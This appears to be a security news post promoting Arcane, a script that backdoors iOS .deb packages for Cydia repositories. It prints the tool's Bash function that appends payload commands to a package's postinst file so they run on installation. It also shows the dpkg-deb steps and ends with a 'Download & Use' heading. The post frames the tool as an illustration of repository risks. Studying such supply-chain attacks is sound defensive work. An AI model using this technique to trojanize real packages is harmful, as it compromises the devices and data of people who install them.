Arcane: backdoor iOS packages (iphone-arm)

Arcane

Arcane is a simple script designed to backdoor iOS packages (iphone-arm) and create the necessary resources for APT repositories. It was created for this publication to help illustrate why Cydia repositories can be dangerous and what post-exploitation attacks are possible from a compromised iOS device.

How Arcane works…

To understand what’s happening in the GIF, decompress a package created with Arcane.

dpkg-deb -R /tmp/cydia/whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb /tmp/whois-decomp

Notice the control and postinst files in the DEBIAN directory. Both files are important.

tree /tmp/whois-decomp/



/tmp/whois-decomp/

├── DEBIAN

│   ├── control

│   └── postinst

└── usr

    └── bin

        └── whois

It’s possible to supply scripts as part of a package when installing or removing applications. Package maintainer scripts include the preinst, postinst, prerm, and postrm files. Arcane takes advantage of the postinst file to execute commands during the installation.

# The "post-installation" file. This file is generally responsible

# for executing commands on the OS after installing the required

# files. It's utilized by developers to manage and maintain various

# aspects of an installation. Arcane abuses this functionality by

# appending malicious Bash commands to the file.

postinst="$tmp/DEBIAN/postinst";



# A function to handle the type of command execution embedded into the

# postinst file.

function inject_backdoor ()

{

    # If --file is used, `cat` the command(s) into the postinst file.

    if [[ "$infile" ]]; then

        cat "$infile" >> "$postinst";

        embed="[$infile]";

    else

        # If no --file, utilize the simple Bash payload, previously

        # defined.

        echo -e "$payload" >> "$postinst";

        embed="generic shell command";

    fi;

    status "embedded $embed into postinst" "error embedding backdoor";

    chmod 0755 "$postinst"

};

The control file contains values that package management tools use when installing packages. Arcane will either modify an existing control or create it.

Download & Use

Rate this post

About The Author

Ddos

Ddos is a seasoned news reporter, bringing over a decade of expertise to the forefront of cyber security and technology reporting. My work provides timely and insightful analysis of emerging trends and critical developments in these rapidly evolving sectors.

See author's posts

Tags: backdoor iOS packages